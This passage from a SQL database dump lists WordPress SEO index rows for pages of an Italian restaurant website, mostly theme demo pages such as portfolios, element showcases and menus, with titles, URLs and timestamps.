Restaurant','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:51:57',1,NULL,NULL,NULL,NULL,0,NULL),(755,NULL,NULL,3043,'post','page',1,0,NULL,NULL,'Restaurant Menu Left','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(756,'https://www.ristorantesolymar.it/vecchio/wishlist/','50:ff8c354a2e3ca3c5ee7470996acbbfe2',3044,'post','page',1,0,NULL,NULL,'Wishlist','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:45:32',1,NULL,NULL,NULL,NULL,0,NULL),(757,'https://www.ristorantesolymar.it/vecchio/product-list/three-columns/','68:bea0a967e13375b92c7a4ec7e1dfd6e8',3045,'post','page',1,3034,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,33,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:45:29',1,NULL,NULL,NULL,NULL,1,NULL),(758,'https://www.ristorantesolymar.it/vecchio/product-list/four-columns/','67:931c5fbdab6ae8f71ec431b3e32136a9',3046,'post','page',1,3034,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,45,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:45:25',1,NULL,NULL,NULL,NULL,1,NULL),(759,'https://www.ristorantesolymar.it/vecchio/product-list/full-width/','65:0a5edee205c1649ee5f0cfbf05ba9a1a',3047,'post','page',1,3034,NULL,NULL,'Full Width','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,42,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:45:22',1,NULL,NULL,NULL,NULL,1,NULL),(760,NULL,NULL,3048,'post','page',1,0,NULL,NULL,'Restaurant Menu Right','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(761,NULL,NULL,3049,'post','page',1,0,NULL,NULL,'Contact Us','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,2,NULL,NULL,'2020-12-05 16:06:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(762,'https://www.ristorantesolymar.it/vecchio/visit-us/','50:d72dcb8203e0083c31e524f75ad6f793',3050,'post','page',1,0,NULL,NULL,'Visit Us','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:33:14',1,NULL,NULL,NULL,NULL,0,NULL),(763,'https://www.ristorantesolymar.it/vecchio/coming-soon-page/','58:de9f544ddf6b4ec4cfcd1d639dab333b',3051,'post','page',1,0,NULL,NULL,'Coming Soon Page','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:33:11',1,NULL,NULL,NULL,NULL,0,NULL),(764,'https://www.ristorantesolymar.it/vecchio/chef-bio/','50:6a1b6d4e2956560835b5c37fa4f3d11f',3052,'post','page',1,0,NULL,NULL,'Chef Bio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:33:08',1,NULL,NULL,NULL,NULL,0,NULL),(765,'https://www.ristorantesolymar.it/vecchio/columns-carousel/','58:829506e0d386d7515d7ba993fcaecbff',3053,'post','page',1,0,NULL,NULL,'Columns Carousel','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:33:06',1,NULL,NULL,NULL,NULL,0,NULL),(766,NULL,NULL,3054,'post','page',1,0,NULL,NULL,'Accolades','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(767,'https://www.ristorantesolymar.it/vecchio/dish-showcase/','55:2767373d3c2a3f500f6dd7d0e967095f',3055,'post','page',1,0,NULL,NULL,'Dish Showcase','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,5,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:19:19',1,NULL,NULL,NULL,NULL,0,NULL),(768,'https://www.ristorantesolymar.it/vecchio/fine-dining/','53:d549ae9a7202e51ac56e26f40fa562fb',3056,'post','page',1,0,NULL,NULL,'Home 1','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,9,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:31:53',1,NULL,NULL,NULL,NULL,0,NULL),(769,'https://www.ristorantesolymar.it/vecchio/restaurant-history/','60:73597d6456056e208b795d034eddc442',3057,'post','page',1,0,NULL,NULL,'Restaurant History','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:31:50',1,NULL,NULL,NULL,NULL,0,NULL),(770,'https://www.ristorantesolymar.it/vecchio/our-kitchen/','53:a60cce2b2e4278859bfc33e1a2b81050',3058,'post','page',1,0,NULL,NULL,'Our Kitchen','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:31:47',1,NULL,NULL,NULL,NULL,0,NULL),(771,'https://www.ristorantesolymar.it/vecchio/orari-di-apertura/','59:fde759dc1d856f981d3f9d915a6c0dde',3059,'post','page',1,0,NULL,NULL,'Orari di apertura','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,2,1,NULL,'2020-12-05 16:06:15','2021-01-31 21:20:07',1,NULL,NULL,NULL,NULL,0,1),(772,'https://www.ristorantesolymar.it/vecchio/fullscreen-showcase/','61:3b4bce45d97a2ffe458c90a770569c8b',3060,'post','page',1,0,NULL,NULL,'Fullscreen Showcase','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:23:02',1,NULL,NULL,NULL,NULL,0,NULL),(773,'https://www.ristorantesolymar.it/vecchio/portfolio/','51:01c4c34237738553eb9c1577ad2df242',3061,'post','page',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:22:59',1,NULL,NULL,NULL,NULL,0,NULL),(774,'https://www.ristorantesolymar.it/vecchio/portfolio/three-columns/','65:d0759642eaba017a5dc77a586e1de74d',3062,'post','page',1,3061,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:22:56',1,NULL,NULL,NULL,NULL,1,NULL),(775,'https://www.ristorantesolymar.it/vecchio/portfolio/four-columns/','64:1bd08283e38c986ec6c4258ff13bec34',3063,'post','page',1,3061,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:18:02',1,NULL,NULL,NULL,NULL,1,NULL),(776,'https://www.ristorantesolymar.it/vecchio/portfolio/four-columns-wide/','69:e1260376da0e8d7bcfcc02b2456230de',3064,'post','page',1,3061,NULL,NULL,'Four Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:17:59',1,NULL,NULL,NULL,NULL,1,NULL),(777,'https://www.ristorantesolymar.it/vecchio/portfolio/three-columns-gallery/','73:d19fdaf0c9ee23fc1b6d390b4b7b35da',3065,'post','page',1,3061,NULL,NULL,'Three Columns Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:17:56',1,NULL,NULL,NULL,NULL,1,NULL),(778,'https://www.ristorantesolymar.it/vecchio/portfolio/four-columns-gallery/','72:aff43b90b0db385ffdd164955ee7c258',3066,'post','page',1,3061,NULL,NULL,'Four Columns Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:17:53',1,NULL,NULL,NULL,NULL,1,NULL),(779,'https://www.ristorantesolymar.it/vecchio/portfolio/four-columns-gallery-wide/','77:ee4db4c20269a224e42d33853a58242d',3067,'post','page',1,3061,NULL,NULL,'Four Columns Gallery Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:17:20',1,NULL,NULL,NULL,NULL,1,NULL),(780,'https://www.ristorantesolymar.it/vecchio/restaurant-menu/','57:45347d1d90baa1707ae822a799599e35',3068,'post','page',1,0,NULL,NULL,'Restaurant Menu','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:17:17',1,NULL,NULL,NULL,NULL,0,NULL),(781,'https://www.ristorantesolymar.it/vecchio/elements/columns/','58:f1023b5b58d5c9021af587d416e4c8a5',3069,'post','page',1,3039,NULL,NULL,'Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:17:13',1,NULL,NULL,NULL,NULL,1,NULL),(782,'https://www.ristorantesolymar.it/vecchio/elements/highlights/','61:8a35aa16499847c51d0edc2e2a84d1f9',3070,'post','page',1,3039,NULL,NULL,'Highlights','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:15','2021-01-31 21:17:10',1,NULL,NULL,NULL,NULL,1,NULL),(783,'https://www.ristorantesolymar.it/vecchio/elements/accordions/','61:0ecc75a0cc73ac07dc640608d8a0af6a',3071,'post','page',1,3039,NULL,NULL,'Accordions','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 20:28:33',1,NULL,NULL,NULL,NULL,1,NULL),(784,'https://www.ristorantesolymar.it/vecchio/elements/buttons/','58:eb6c814ed32740f62b37dd67fa19dc43',3072,'post','page',1,3039,NULL,NULL,'Buttons','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,6,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 20:28:30',1,NULL,NULL,NULL,NULL,1,NULL),(785,'https://www.ristorantesolymar.it/vecchio/elements/tabs/','55:e10080cd32f31d84ed5c2bb8511ea8db',1382,'post','page',1,3039,NULL,NULL,'Tabs','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:43:09',1,NULL,NULL,NULL,NULL,1,NULL),(786,'https://www.ristorantesolymar.it/vecchio/elements/testimonials/','63:cce3788a41a4b0ae90c65cc92eb47f9f',1393,'post','page',1,3039,NULL,NULL,'Testimonials','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:43:07',1,NULL,NULL,NULL,NULL,1,NULL),(787,'https://www.ristorantesolymar.it/vecchio/elements/google-maps/','62:b257ce1d0aead28756dba763fe8b4f64',1642,'post','page',1,3039,NULL,NULL,'Google Maps','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:43:04',1,NULL,NULL,NULL,NULL,1,NULL),(788,'https://www.ristorantesolymar.it/vecchio/elements/image-gallery/','64:0fa9b12938a3ee0f41dd6ad7ab69bade',1650,'post','page',1,3039,NULL,NULL,'Image Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:38:21',1,NULL,NULL,NULL,NULL,1,NULL),(789,'https://www.ristorantesolymar.it/vecchio/elements/checker-box/','62:1f91b1235900c91ac4efb60f772272b1',1658,'post','page',1,3039,NULL,NULL,'Checker Box','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:38:18',1,NULL,NULL,NULL,NULL,1,NULL),(790,'https://www.ristorantesolymar.it/vecchio/elements/blog-list/','60:9a5b6f0564bf89141514c9e628871f60',1662,'post','page',1,3039,NULL,NULL,'Blog List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:38:15',1,NULL,NULL,NULL,NULL,1,NULL),(791,NULL,NULL,1679,'post','page',1,0,NULL,NULL,'Right Sidebar','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(792,'https://www.ristorantesolymar.it/vecchio/elements/info-box/','59:395b7bb669ec62d0a5d4eba6fa1a04ca',1722,'post','page',1,3039,NULL,NULL,'Info Box','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:38:13',1,NULL,NULL,NULL,NULL,1,NULL),(793,'https://www.ristorantesolymar.it/vecchio/elements/pie-chart/','60:b711150f5523b8ae4f341aef589e4445',1734,'post','page',1,3039,NULL,NULL,'Pie Chart','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:33:14',1,NULL,NULL,NULL,NULL,1,NULL),(794,'https://www.ristorantesolymar.it/vecchio/elements/portfolio-trio/','65:e624b0de0eead1c98db2b1bf192df5c3',1742,'post','page',1,3039,NULL,NULL,'Portfolio Trio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:33:11',1,NULL,NULL,NULL,NULL,1,NULL),(795,'https://www.ristorantesolymar.it/vecchio/elements/contact-form/','63:25735a07802965c0f8b0004ccaa9f829',3073,'post','page',1,3039,NULL,NULL,'Contact Form','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 20:28:27',1,NULL,NULL,NULL,NULL,1,NULL),(796,'https://www.ristorantesolymar.it/vecchio/elements/product-list/','63:8486bf8d5df4105f10748a2e12e74daa',1804,'post','page',1,3039,NULL,NULL,'Product List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,35,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:33:08',1,NULL,NULL,NULL,NULL,1,NULL),(797,'https://www.ristorantesolymar.it/vecchio/portfolio/portfolio-carousel/','70:c10dcfe9a550f2bc7aa0e8805fc6c401',1805,'post','page',1,3061,NULL,NULL,'Portfolio Carousel','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:33:05',1,NULL,NULL,NULL,NULL,1,NULL),(798,'https://www.ristorantesolymar.it/vecchio/portfolio/fullscreen-slider/','69:6f47de5611a5a354eb4e37f38ad79128',1811,'post','page',1,3061,NULL,NULL,'Fullscreen Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:28:07',1,NULL,NULL,NULL,NULL,1,NULL),(799,'https://www.ristorantesolymar.it/vecchio/portfolio/portfolio-slider/','68:cd214b369756de456e3d66439d964db0',1819,'post','page',1,3061,NULL,NULL,'Portfolio Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:28:03',1,NULL,NULL,NULL,NULL,1,NULL),(800,'https://www.ristorantesolymar.it/vecchio/elements/dropcaps/','59:d95c386ff3482251e8463639abdd5f29',1827,'post','page',1,3039,NULL,NULL,'Dropcaps','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:27:57',1,NULL,NULL,NULL,NULL,1,NULL),(801,'https://www.ristorantesolymar.it/vecchio/elements/progress-bar/','63:418dd68a5b0780a6bda546f06be61456',1836,'post','page',1,3039,NULL,NULL,'Progress Bar','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:27:52',1,NULL,NULL,NULL,NULL,1,NULL),(802,'https://www.ristorantesolymar.it/vecchio/elements/countdown/','60:a5484883fcaa32df004dd77486e25eb4',1852,'post','page',1,3039,NULL,NULL,'Countdown','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:23:15',1,NULL,NULL,NULL,NULL,1,NULL),(803,'https://www.ristorantesolymar.it/vecchio/elements/counters/','59:66e19f3d7f0edf0025cb97e75557daba',1857,'post','page',1,3039,NULL,NULL,'Counters','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:23:12',1,NULL,NULL,NULL,NULL,1,NULL),(804,'https://www.ristorantesolymar.it/vecchio/elements/section-title/','64:c00ee1cba24adaffaccbc193a7e7303a',3074,'post','page',1,3039,NULL,NULL,'Section Title','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 20:28:24',1,NULL,NULL,NULL,NULL,1,NULL),(805,'https://www.ristorantesolymar.it/vecchio/elements/separators/','61:65a6f14889b4dcaf8731e8144fc7394f',1948,'post','page',1,3039,NULL,NULL,'Separators','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:23:08',1,NULL,NULL,NULL,NULL,1,NULL),(806,NULL,NULL,1995,'post','page',1,3039,NULL,NULL,'Restaurant Menu','draft',0,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(807,'https://www.ristorantesolymar.it/vecchio/elements/video-button/','63:eefa36aa2ce7c2b8941e0c5dcca47d27',2019,'post','page',1,3039,NULL,NULL,'Video Button','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:23:05',1,NULL,NULL,NULL,NULL,1,NULL),(808,'https://www.ristorantesolymar.it/vecchio/elements/reservation-form/','67:47d7d1dd9f4b98212276463f996ec956',2174,'post','page',1,3039,NULL,NULL,'Reservation Form','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:18:15',1,NULL,NULL,NULL,NULL,1,NULL),(809,'https://www.ristorantesolymar.it/vecchio/elements/instagram-list/','65:9e1f3cfe8fa45c7f1e22cf17977521e9',2387,'post','page',1,3039,NULL,NULL,'Instagram List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:18:12',1,NULL,NULL,NULL,NULL,1,NULL),(810,'https://www.ristorantesolymar.it/vecchio/left-sidebar/','54:c331b1bada29d558cff832b246571729',2419,'post','page',1,0,NULL,NULL,'Left Sidebar','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:18:08',1,NULL,NULL,NULL,NULL,0,NULL),(811,NULL,NULL,2421,'post','page',1,0,NULL,NULL,'No Sidebar','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(812,'https://www.ristorantesolymar.it/vecchio/portfolio/portfolio-list-trio/','71:f39d0599a54a11e61cbd5a14f6afa21d',2435,'post','page',1,3061,NULL,NULL,'Portfolio List Trio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:16','2021-01-31 22:18:04',1,NULL,NULL,NULL,NULL,1,NULL),(813,'https://www.ristorantesolymar.it/vecchio/portfolio/portfolio-slider-grid/','73:23eb0156b75731d90c5d7db388d345c9',2448,'post','page',1,3061,NULL,NULL,'Portfolio Slider Grid','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:17','2021-01-31 22:17:06',1,NULL,NULL,NULL,NULL,1,NULL),(814,'https://www.ristorantesolymar.it/vecchio/portfolio/gallery-list/','64:2a93dde448678f58268daf57e4e3be7e',2457,'post','page',1,3061,NULL,NULL,'Gallery List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:17','2021-01-31 22:17:01',1,NULL,NULL,NULL,NULL,1,NULL),(815,'https://www.ristorantesolymar.it/vecchio/elements/menu-pop-up/','62:b300aa56612180fd19cac5c0b8cb0553',2472,'post','page',1,3039,NULL,NULL,'Menu Pop Up','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:17','2021-01-31 22:16:57',1,NULL,NULL,NULL,NULL,1,NULL),(816,'https://www.ristorantesolymar.it/vecchio/elements/team/','55:48f63ef0117c6163164a8797b3b73a46',2477,'post','page',1,3039,NULL,NULL,'Team','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:17','2021-01-31 22:16:54',1,NULL,NULL,NULL,NULL,1,NULL),(817,'https://www.ristorantesolymar.it/vecchio/elements/reservation-pop-up/','69:263e3f7c620780a405ee4ecb35114c4a',2494,'post','page',1,3039,NULL,NULL,'Reservation Pop Up','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:17','2021-01-31 22:08:31',1,NULL,NULL,NULL,NULL,1,NULL),(818,'https://www.ristorantesolymar.it/vecchio/landing-pop-up/','56:0710b803b62947a10a3f21c7c098ab1e',2542,'post','page',1,0,NULL,NULL,'Landing Pop Up','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-12-05 16:06:17','2021-01-31 